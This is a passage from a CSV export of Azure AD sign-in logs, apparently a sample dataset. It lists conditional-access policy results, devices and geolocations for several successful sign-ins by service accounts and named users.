'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:18,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",48924ade-b17e-45fa-8de4-53ac831d4400,,,"{'countryOrRegion': 'IN', 'geoCoordinates': {'longitude': 75.88970184326172, 'latitude': 22.797740936279297}, 'state': 'Madhya Pradesh', 'city': 'Shakkar Khedi'}",none,none,none,none,[],{'errorCode': 0},Sentinel Partner Account 6,dd7e1752-57a8-4e72-8589-6a68e4a1f500,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,48924ade-b17e-45fa-8de4-53ac831d4400,SigninLogs,Sucess,22.79774094,75.88970184
+1341,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c3571d84-28e1-41ce-bcef-a16e68648d9f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",22fd8c7c-75eb-4549-80fa-172769cb0400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,22fd8c7c-75eb-4549-80fa-172769cb0400,SigninLogs,Sucess,36.6404686,-78.26995087
+1342,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c3571d84-28e1-41ce-bcef-a16e68648d9f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",22fd8c7c-75eb-4549-80fa-172769cb0400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,22fd8c7c-75eb-4549-80fa-172769cb0400,SigninLogs,Sucess,36.6404686,-78.26995087
+1343,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:19.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cfcf3990-7152-4749-81ff-b96f50d59f00,Microsoft.aadiam,Microsoft.aadiam,,Sentinel Partner Account 6,4,IN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",1b9c04f5-df33-43c9-b970-b2ba91be3d00,,,"{'countryOrRegion': 'IN', 'geoCoordinates': {'longitude': 75.88970184326172, 'latitude': 22.797740936279297}, 'state': 'Madhya Pradesh', 'city': 'Shakkar Khedi'}",none,none,none,none,[],{'errorCode': 0},Sentinel Partner Account 6,dd7e1752-57a8-4e72-8589-6a68e4a1f500,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,1b9c04f5-df33-43c9-b970-b2ba91be3d00,SigninLogs,Sucess,22.79774094,75.88970184
+1344,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:53.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:54,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",145a2518-4c12-4fab-9b1e-66eb05ce2300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,145a2518-4c12-4fab-9b1e-66eb05ce2300,SigninLogs,Sucess,32.0840416,34.88776016
+1345,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:55.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5c9ec8d9-47c7-436d-b040-36338b294696,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",22fd8c7c-75eb-4549-80fa-172714cb0400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,22fd8c7c-75eb-4549-80fa-172714cb0400,SigninLogs,Sucess,36.6404686,-78.26995087
+1346,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:49.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0d3dadc7-5b90-4194-87e2-04e075580400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0d3dadc7-5b90-4194-87e2-04e075580400,SigninLogs,Sucess,33.0175209,35.44601059
+1347,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:55.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,341fa275-b050-477b-a6ae-2c24e779c3af,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",86807d56-c656-4319-9bdc-577e37bd0400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,86807d56-c656-4319-9bdc-577e37bd0400,SigninLogs,Sucess,36.6404686,-78.26995087
